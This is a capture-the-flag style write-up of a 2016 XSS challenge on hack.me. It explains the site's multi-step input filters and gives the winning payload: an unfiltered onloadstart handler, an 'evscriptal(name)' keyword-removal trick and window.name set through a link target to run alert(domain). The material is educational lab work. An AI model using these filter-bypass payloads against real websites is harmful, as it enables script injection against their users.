Hi ,
At June 10, 2016 I published a XSS challenge on hack.me platform I called Small Youtube XSS . If you are here just for solution and not interested in write-up here you go https://jsfiddle.net/n8dsb1w9/
Here was the roles and hints
Description
Hi , In this XSS challenge you need to use many tricks for make the vector works ! It is not so hard and not so easy .
Rules
- No user interaction allowed .
- Use only modern browsers (IE11 , FF49 ... etc)
- We need to see alert box with domain name .
Hints
- Use (?xss=) for inject .
- Try to find missing or weak *things* in HTTP header and HTML source (what else !? ).
- Have you ever been told that you are too short for join to basketball team ? now you are too long to XSS this :p
- watch the video for motivation (https://www.youtube.com/watch?v=hzBCI13rJmA) .
If you solve it please contact me (a.hussam[at]isecur1ty.org) Last but not least enjoy
--------------------------------------------------------------------------
The challenge was run till now for 4 months and there are only 2 solvers and it has been started more than 700 times . So here is the solution .
Solution
I deleted the source code along time ago so I will try to guess what I wrote before . I made this challenge based on the multi-steps filters that do filtering in serial steps .
- First it replaces words like eval,setIntraval,setTimeout with (xss-event).
- Second it remove script word (key of solution) .
- Third it will replace event handler attributes with (xss-event) . (except 2 of them)
- Htmlentities is enabled on the xss parameter so less , greater than and double quotation is useless .
1
2
3
4
| <video width="450" height="400" controls name=injection_here> <source src="http://www.google.com/test.mp4" type="video/mp4"> Your browser does not support the video tag. </video> |
Our injection point is at video tag let's see even handler for video tag HTML5 Video Events and API
You will find them all has been filtered but two of them aren't ! onloadstart , onratechange
The domain is filtered so we will use the script remove trick !
1
| $_GET['xss'] = substr( $_GET['xss'], 0, 26) ;
|
Plot twist
(https://en.wikipedia.org/wiki/Plot_twist)
We should use another method to alert document.domain since the regular payload is too long . We should use eval() . eval with make our string works as JS code but where we could put a string ?! we can make it using window.name :)
eval is filtered but we need to use the sciprt trick again . so it will be evscriptal(name) .
So all in one will be
1 | <a href="http://s25504-102604-rmx.tarentum.hack.me/myvideo.php?xss=''onloadstart=evscriptal(name)" target="javascript:alert(domain);">click me</a> |
And here we are
there are a multi-way to give name to a window like window.open or name in iframe tag which I allowed to be framed but I made a frame busting in the page can be bypassed easily .
Solvers
- Adam Simuntis (adam.simuntis[at]secforce.com) with nice and expected
- Lucas Philippe (Bug in my code which is fixed)
I hope you enjoy the write-up and the challenge see you soon with another one .
If you want to contact me reach me my twitter account @Abdulahhusam
